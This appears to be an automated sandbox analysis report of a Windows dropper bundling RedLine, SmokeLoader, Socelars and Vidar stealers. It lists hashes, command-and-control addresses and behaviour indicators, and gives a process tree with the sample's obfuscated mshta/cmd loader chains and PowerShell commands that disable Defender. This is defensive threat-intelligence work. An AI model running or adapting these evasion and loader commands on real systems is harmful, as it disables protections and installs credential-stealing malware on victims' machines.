redline | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

Target

f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Size

5.9MB
MD5

00987bdf68fafbdfa9dd1365a6827d72
SHA1

f205c391087833eeb978895d37c2e199c4bf2747
SHA256

f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb
SHA512

9fb4e297f48a95d31a3bc82159b7304f29f50d9e7b823a91b6af02453deca7cf5ef50698b1aee9f00120c1d5d90de1b0fdbb5c92fedbc5823eea743d9e3e6319

Score

10^/10

redline smokeloader socelars vidar 933 chris media29 srtupdate33 aspackv2 backdoor infostealer spyware stealer suricata trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

redline

Botnet

media29

91.121.67.60:23325

Extracted

Family

redline

Botnet

srtupdate33

135.181.129.119:4805

Extracted

Family

redline

Botnet

chris

194.104.136.5:46013

Extracted

Family

smokeloader

Version

2020

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

https://mas.to/@lilocc

Attributes

profile_id
933

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	1192	rundll32.exe	150
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6584	1192	rundll32.exe	150

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

resource	yara_rule
behavioral20/memory/5072-289-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral20/memory/5072-290-0x0000000000418D2A-mapping.dmp	family_redline
behavioral20/memory/3408-295-0x0000000000418D32-mapping.dmp	family_redline
behavioral20/memory/4432-296-0x0000000000418D3E-mapping.dmp	family_redline
behavioral20/memory/4432-294-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral20/memory/3408-292-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral20/files/0x000400000001abb9-176.dat	family_socelars
behavioral20/files/0x000400000001abb9-218.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral20/memory/2964-551-0x0000000003260000-0x0000000003336000-memory.dmp	family_vidar
behavioral20/memory/2964-584-0x0000000000400000-0x0000000002F63000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral20/files/0x000400000001abc2-128.dat	aspack_v212_v242
behavioral20/files/0x000400000001abc2-125.dat	aspack_v212_v242
behavioral20/files/0x000400000001abc4-133.dat	aspack_v212_v242
behavioral20/files/0x000400000001abc4-130.dat	aspack_v212_v242
behavioral20/files/0x000400000001abc1-132.dat	aspack_v212_v242
behavioral20/files/0x000400000001abc1-131.dat	aspack_v212_v242
behavioral20/files/0x000400000001abc1-126.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 21 IoCs

pid	Process
4408	setup_installer.exe
3280	setup_install.exe
3244	cmd.exe
4140	179731.exe
4128	Fri0471ced4d802994.exe
4136	Fri04113f869350dcf8.exe
2344	Fri04e6f3b78ae5759.exe
4764	Fri043b65bf09aa6129a.exe
4904	mshta.exe
4884	Fri040eeed7d137.exe
4952	Fri042d82e64f594.exe
4916	Fri0431de7a47.exe
1252	Fri0470d89df3bb718.exe
5008	Fri04b1200e850ea1bc.exe
944	Fri040df945a5.exe
2292	Fri043a70f76ef98.exe
5024	Fri048a4e8610c6c199.exe
3164	Fri0480a54c0d2a7.exe
5116	Fri047a1b6fc980f8.exe
3744	Fri0471ced4d802994.tmp
1648	Fri0471ced4d802994.exe

Loads dropped DLL 9 IoCs

pid	Process
3280	setup_install.exe
3280	setup_install.exe
3280	setup_install.exe
3280	setup_install.exe
3280	setup_install.exe
3280	setup_install.exe
3280	setup_install.exe
3280	setup_install.exe
3744	Fri0471ced4d802994.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com
92	ipinfo.io
155	freegeoip.app
165	freegeoip.app
227	ipinfo.io
228	ipinfo.io
90	ipinfo.io
91	ipinfo.io
153	freegeoip.app
156	freegeoip.app
180	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 15 IoCs

pid	pid_target	Process	procid_target
4836	3280	WerFault.exe	70
1136	4432	WerFault.exe	119
5312	944	WerFault.exe	103
5616	944	WerFault.exe	103
5964	944	WerFault.exe	103
5484	944	WerFault.exe	103
4648	2612	WerFault.exe	148
4088	652	WerFault.exe	139
1248	652	WerFault.exe	139
684	944	WerFault.exe	103
1960	652	WerFault.exe	139
6384	652	WerFault.exe	139
6552	944	WerFault.exe	103
6896	944	WerFault.exe	103
7128	652	WerFault.exe	139

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
7020	schtasks.exe
7016	schtasks.exe

Kills process with taskkill 7 IoCs

evasion

pid	Process
4540	taskkill.exe
4572	taskkill.exe
1736	taskkill.exe
5364	taskkill.exe
5932	taskkill.exe
6372	taskkill.exe
2176	taskkill.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeAssignPrimaryTokenPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeLockMemoryPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeIncreaseQuotaPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeMachineAccountPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeTcbPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeSecurityPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeTakeOwnershipPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeLoadDriverPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeSystemProfilePrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeSystemtimePrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeProfSingleProcessPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeIncBasePriorityPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeCreatePagefilePrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeCreatePermanentPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeBackupPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeRestorePrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeShutdownPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeDebugPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeAuditPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeSystemEnvironmentPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeChangeNotifyPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeRemoteShutdownPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeUndockPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeSyncAgentPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeEnableDelegationPrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeManageVolumePrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeImpersonatePrivilege	3164	Fri0480a54c0d2a7.exe
Token: SeCreateGlobalPrivilege	3164	Fri0480a54c0d2a7.exe
Token: 31	3164	Fri0480a54c0d2a7.exe
Token: 32	3164	Fri0480a54c0d2a7.exe
Token: 33	3164	Fri0480a54c0d2a7.exe
Token: 34	3164	Fri0480a54c0d2a7.exe
Token: 35	3164	Fri0480a54c0d2a7.exe
Token: SeDebugPrivilege	1252	Fri0470d89df3bb718.exe
Token: SeRestorePrivilege	4836	WerFault.exe
Token: SeBackupPrivilege	4836	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 4408	3976	f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe	69
PID 3976 wrote to memory of 4408	3976	f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe	69
PID 3976 wrote to memory of 4408	3976	f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe	69
PID 4408 wrote to memory of 3280	4408	setup_installer.exe	70
PID 4408 wrote to memory of 3280	4408	setup_installer.exe	70
PID 4408 wrote to memory of 3280	4408	setup_installer.exe	70
PID 3280 wrote to memory of 436	3280	setup_install.exe	73
PID 3280 wrote to memory of 436	3280	setup_install.exe	73
PID 3280 wrote to memory of 436	3280	setup_install.exe	73
PID 3280 wrote to memory of 500	3280	setup_install.exe	74
PID 3280 wrote to memory of 500	3280	setup_install.exe	74
PID 3280 wrote to memory of 500	3280	setup_install.exe	74
PID 3280 wrote to memory of 1128	3280	setup_install.exe	75
PID 3280 wrote to memory of 1128	3280	setup_install.exe	75
PID 3280 wrote to memory of 1128	3280	setup_install.exe	75
PID 3280 wrote to memory of 1196	3280	setup_install.exe	92
PID 3280 wrote to memory of 1196	3280	setup_install.exe	92
PID 3280 wrote to memory of 1196	3280	setup_install.exe	92
PID 436 wrote to memory of 1212	436	cmd.exe	76
PID 436 wrote to memory of 1212	436	cmd.exe	76
PID 436 wrote to memory of 1212	436	cmd.exe	76
PID 500 wrote to memory of 1388	500	cmd.exe	77
PID 500 wrote to memory of 1388	500	cmd.exe	77
PID 500 wrote to memory of 1388	500	cmd.exe	77
PID 3280 wrote to memory of 1436	3280	setup_install.exe	78
PID 3280 wrote to memory of 1436	3280	setup_install.exe	78
PID 3280 wrote to memory of 1436	3280	setup_install.exe	78
PID 3280 wrote to memory of 1624	3280	setup_install.exe	79
PID 3280 wrote to memory of 1624	3280	setup_install.exe	79
PID 3280 wrote to memory of 1624	3280	setup_install.exe	79
PID 3280 wrote to memory of 1748	3280	setup_install.exe	91
PID 3280 wrote to memory of 1748	3280	setup_install.exe	91
PID 3280 wrote to memory of 1748	3280	setup_install.exe	91
PID 3280 wrote to memory of 1756	3280	setup_install.exe	80
PID 3280 wrote to memory of 1756	3280	setup_install.exe	80
PID 3280 wrote to memory of 1756	3280	setup_install.exe	80
PID 3280 wrote to memory of 2008	3280	setup_install.exe	82
PID 3280 wrote to memory of 2008	3280	setup_install.exe	82
PID 3280 wrote to memory of 2008	3280	setup_install.exe	82
PID 3280 wrote to memory of 2100	3280	setup_install.exe	81
PID 3280 wrote to memory of 2100	3280	setup_install.exe	81
PID 3280 wrote to memory of 2100	3280	setup_install.exe	81
PID 3280 wrote to memory of 2184	3280	setup_install.exe	90
PID 3280 wrote to memory of 2184	3280	setup_install.exe	90
PID 3280 wrote to memory of 2184	3280	setup_install.exe	90
PID 3280 wrote to memory of 2412	3280	setup_install.exe	83
PID 3280 wrote to memory of 2412	3280	setup_install.exe	83
PID 3280 wrote to memory of 2412	3280	setup_install.exe	83
PID 3280 wrote to memory of 2496	3280	setup_install.exe	84
PID 3280 wrote to memory of 2496	3280	setup_install.exe	84
PID 3280 wrote to memory of 2496	3280	setup_install.exe	84
PID 3280 wrote to memory of 2664	3280	setup_install.exe	89
PID 3280 wrote to memory of 2664	3280	setup_install.exe	89
PID 3280 wrote to memory of 2664	3280	setup_install.exe	89
PID 3280 wrote to memory of 2696	3280	setup_install.exe	85
PID 3280 wrote to memory of 2696	3280	setup_install.exe	85
PID 3280 wrote to memory of 2696	3280	setup_install.exe	85
PID 3280 wrote to memory of 2708	3280	setup_install.exe	86
PID 3280 wrote to memory of 2708	3280	setup_install.exe	86
PID 3280 wrote to memory of 2708	3280	setup_install.exe	86
PID 3280 wrote to memory of 3044	3280	setup_install.exe	87
PID 3280 wrote to memory of 3044	3280	setup_install.exe	87
PID 3280 wrote to memory of 3044	3280	setup_install.exe	87
PID 3280 wrote to memory of 3804	3280	setup_install.exe	88

C:\Users\Admin\AppData\Local\Temp\f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
"C:\Users\Admin\AppData\Local\Temp\f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3976
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS831FB566\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:436
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        
        PID:1212
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:500
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:1388
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri048a4e8610c6c199.exe
      4⤵
      PID:1128
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri048a4e8610c6c199.exe
        
        Fri048a4e8610c6c199.exe
        5⤵
        
        PID:3244
      - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri048a4e8610c6c199.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri048a4e8610c6c199.exe" -u
        6⤵
        Executes dropped EXE
        
        PID:5024
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri040eeed7d137.exe
      4⤵
      PID:1436
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri040eeed7d137.exe
        
        Fri040eeed7d137.exe
        5⤵
        Executes dropped EXE
        
        PID:4884
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04e6f3b78ae5759.exe
      4⤵
      PID:1624
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04e6f3b78ae5759.exe
        
        Fri04e6f3b78ae5759.exe
        5⤵
        Executes dropped EXE
        
        PID:2344
      - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04e6f3b78ae5759.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04e6f3b78ae5759.exe
        6⤵
        
        PID:3408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04f70c88181ec8.exe
      4⤵
      PID:1756
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04f70c88181ec8.exe
        
        Fri04f70c88181ec8.exe
        5⤵
        
        PID:4140
      - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04f70c88181ec8.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04f70c88181ec8.exe
        6⤵
        
        PID:5072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04b1200e850ea1bc.exe
      4⤵
      PID:2100
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04b1200e850ea1bc.exe
        
        Fri04b1200e850ea1bc.exe
        5⤵
        Executes dropped EXE
        
        PID:5008
      - C:\Users\Admin\Pictures\Adobe Films\TFYhs_eqPwU0Vyg5K4PnbJ3N.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\TFYhs_eqPwU0Vyg5K4PnbJ3N.exe"
        6⤵
        
        PID:4132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri043b65bf09aa6129a.exe
      4⤵
      PID:2008
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri043b65bf09aa6129a.exe
        
        Fri043b65bf09aa6129a.exe
        5⤵
        Executes dropped EXE
        
        PID:4764
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPT:cLOsE(CREatEObjecT( "wscript.shell" ). ruN ("cMD.eXe /q/c coPY /y ""C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri043b65bf09aa6129a.exe"" ..\FJX5FJQXmPBM.exE && STart ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6 & If """" == """" for %m iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri043b65bf09aa6129a.exe"" ) do taskkill /F /iM ""%~nXm"" " , 0, tRUE ) )
        6⤵
        
        PID:3344
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q/c coPY /y "C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri043b65bf09aa6129a.exe" ..\FJX5FJQXmPBM.exE && STart ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6 & If ""== "" for %m iN ( "C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri043b65bf09aa6129a.exe") do taskkill /F /iM "%~nXm"
        7⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE
        
        ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6
        8⤵
        
        PID:1576
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPT:cLOsE(CREatEObjecT( "wscript.shell" ). ruN ("cMD.eXe /q/c coPY /y ""C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE"" ..\FJX5FJQXmPBM.exE && STart ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6 & If ""-POMRtdzPDR3vhvdcwHXlRw6vXu6 "" == """" for %m iN ( ""C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE"" ) do taskkill /F /iM ""%~nXm"" " , 0, tRUE ) )
        9⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q/c coPY /y "C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE" ..\FJX5FJQXmPBM.exE && STart ..\FJX5FjQXmPBM.eXE -POMRtdzPDR3vhvdcwHXlRw6vXu6 & If "-POMRtdzPDR3vhvdcwHXlRw6vXu6 "== "" for %m iN ( "C:\Users\Admin\AppData\Local\Temp\FJX5FJQXmPBM.exE") do taskkill /F /iM "%~nXm"
        10⤵
        Executes dropped EXE
        
        PID:3244
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRipt: CLOSE ( CreateobjeCT( "WScRipT.shELL" ). RUn ( "cmd /r EcHO | set /P = ""MZ"" > LBBCBWE.COE & Copy /Y /b LBbCBWe.COE + PdpGW72.5yO +mNJeI.lLp + GL6hqC.zFb ..\JPBHeH05.Q & StART msiexec -y ..\JPBHeH05.Q & DeL /q * " , 0, TRue ))
        9⤵
        Executes dropped EXE
        
        PID:4904
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r EcHO | set /P = "MZ" > LBBCBWE.COE & Copy /Y /b LBbCBWe.COE + PdpGW72.5yO+mNJeI.lLp +GL6hqC.zFb ..\JPBHeH05.Q &StART msiexec -y ..\JPBHeH05.Q& DeL /q *
        10⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
        11⤵
        
        PID:2500
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>LBBCBWE.COE"
        11⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -y ..\JPBHeH05.Q
        11⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /iM "Fri043b65bf09aa6129a.exe"
        8⤵
        Kills process with taskkill
        
        PID:4572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri047a1b6fc980f8.exe
      4⤵
      PID:2412
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri047a1b6fc980f8.exe
        
        Fri047a1b6fc980f8.exe
        5⤵
        Executes dropped EXE
        
        PID:5116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri040df945a5.exe /mixone
      4⤵
      PID:2496
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri040df945a5.exe
        
        Fri040df945a5.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:944
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 660
        6⤵
        Program crash
        
        PID:5312
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 676
        6⤵
        Program crash
        
        PID:5616
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 712
        6⤵
        Program crash
        
        PID:5964
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 644
        6⤵
        Program crash
        
        PID:5484
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 884
        6⤵
        Program crash
        
        PID:684
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 956
        6⤵
        Program crash
        
        PID:6552
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 1084
        6⤵
        Program crash
        
        PID:6896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri0431de7a47.exe
      4⤵
      PID:2696
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0431de7a47.exe
        
        Fri0431de7a47.exe
        5⤵
        Executes dropped EXE
        
        PID:4916
      - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0431de7a47.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0431de7a47.exe
        6⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 24
        7⤵
        Program crash
        
        PID:1136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04a13875aa1c59b58.exe
      4⤵
      PID:2708
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04a13875aa1c59b58.exe
        
        Fri04a13875aa1c59b58.exe
        5⤵
        
        PID:4904
      - C:\Users\Admin\AppData\Roaming\179731.exe
        
        "C:\Users\Admin\AppData\Roaming\179731.exe"
        6⤵
        Executes dropped EXE
        
        PID:4140
      - C:\Users\Admin\AppData\Roaming\1974187.exe
        
        "C:\Users\Admin\AppData\Roaming\1974187.exe"
        6⤵
        
        PID:5156
      - C:\Users\Admin\AppData\Roaming\131126.exe
        
        "C:\Users\Admin\AppData\Roaming\131126.exe"
        6⤵
        
        PID:5328
      - C:\Users\Admin\AppData\Roaming\2984668.exe
        
        "C:\Users\Admin\AppData\Roaming\2984668.exe"
        6⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\2984668.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\2984668.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        7⤵
        
        PID:5796
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\2984668.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\2984668.exe" ) do taskkill -f -Im "%~NXZ"
        8⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
        
        ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
        9⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        10⤵
        
        PID:2704
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
        11⤵
        
        PID:1224
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
        10⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *
        11⤵
        
        PID:6700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EChO "
        12⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
        12⤵
        
        PID:7136
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\WfNRfms4.K
        12⤵
        
        PID:6504
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K
        13⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -Im "2984668.exe"
        9⤵
        Kills process with taskkill
        
        PID:5364
      - C:\Users\Admin\AppData\Roaming\3925719.exe
        
        "C:\Users\Admin\AppData\Roaming\3925719.exe"
        6⤵
        
        PID:5468
        
